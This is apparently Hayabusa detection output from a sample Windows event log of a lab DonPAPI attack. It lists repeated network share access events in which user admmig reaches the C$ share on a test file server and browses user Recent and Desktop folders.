2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
